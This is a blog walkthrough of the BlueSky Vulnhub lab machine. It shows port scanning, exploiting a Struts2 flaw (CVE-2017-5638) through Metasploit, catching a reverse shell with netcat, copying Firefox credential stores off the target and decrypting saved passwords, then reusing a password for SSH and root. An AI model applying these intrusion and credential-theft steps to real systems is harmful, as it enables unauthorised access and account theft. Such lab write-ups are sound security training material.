BlueSky Walkthrough – Vulnhub – Writeup

bluesky walkthrough vulnhub writeup

BlueSky is an easy machine from Vulnhub that requires a bit of initial enumeration. However, upon getting the foothold, this machine isn’t that difficult. Also, this machine worked in VMWare but not in VirtualBox for me. I have taken the reference from Proxy Programmer’s video for the foothold. You can check it at the end of this blog post. “BlueSky Walkthrough – Vulnhub – Writeup”

Link to the machine: https://www.vulnhub.com/entry/bluesky-1,623/

System Failure Walkthrough – Vulnhub – Writeup

Identify the target

First of all, we have to identify the IP address of the target machine while working with the virtual environments.

sudo netdiscover -r 192.168.19.0/24
Target IP address: 192.168.19.147

Scan open ports

Next, we have to look for the open ports on the target. This gives us information about the open ports on the target machine.

nmap -v -T4 -sC -sV -p- -oN nmap.log 192.168.19.147
Nmap scan results

We can see from the screenshot above that we have an Apache Tomcat server running on the target.

Enumerate tomcat server

This is the part that I really couldn’t get anything from the tomcat server. However, from the Proxy Programmer’s video, I get that we need to guess related frameworks. Also, when I searched tomcat on Metasploit, I got a result struts which is a framework for Java EE. With the help of Proxy Programmer’s video, I identified that the vulnerability is on the struts2 framework.

Github Link: https://github.com/jrrdev/cve-2017-5638/blob/master/exploit/exploit.py

The above exploit works on python2 only. However, I will be using the Metasploit framework for getting a reverse shell.

msfconsole command history

Although it said that the exploit failed, we have a session running in the background.

Session in background

Since we have a session in the background, I decided to spawn another reverse shell in my bash as Metasploit shells aren’t as stable.

nc -nlvp 9001
Spawned a reverse shell from Metasploit
Got a reverse shell

Escalate privileges

Next, I upgraded the reverse shell. For more information, check my other blog post.

Upgrade to an intelligent reverse shell

.mozilla directory
key4.db and logins.json

Since we have key4.db and logins.json files, we can decrypt the password using firepwd tool. For that, we have to transfer these two files to my local machine.

# On the target machine
python3 -m http.server
# On my local machine
wget http://192.168.19.147:8000/key4.db
wget http://192.168.19.147:8000/logins.json

Github link to Firepwd: https://github.com/lclevy/firepwd

We have to install the required packages and then put these two files on the same directory where firepwd.py resides.

python3 firepwd.py

We got a twitter’s password.

Twitter password

Then, when I checked for password reuse by logging into the SSH service, it worked.

SSH Login

Now, let’s check the sudo permissions.

sudo permissions

We can see that the user has all permissions and we can now switch to root.

Root access

Walkthrough by Proxy Programmer

Walkthrough of Proxy Programmer
BlueSky Walkthrough – Vulnhub – Writeup
0 0 votes
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
Scroll to top

AdBlock Detected


I am sorry for the popup but it costs me money and time to write these posts.
Please disable the adblocker to proceed.
If you are a regular visitor, you can buymeacoffee too. 😉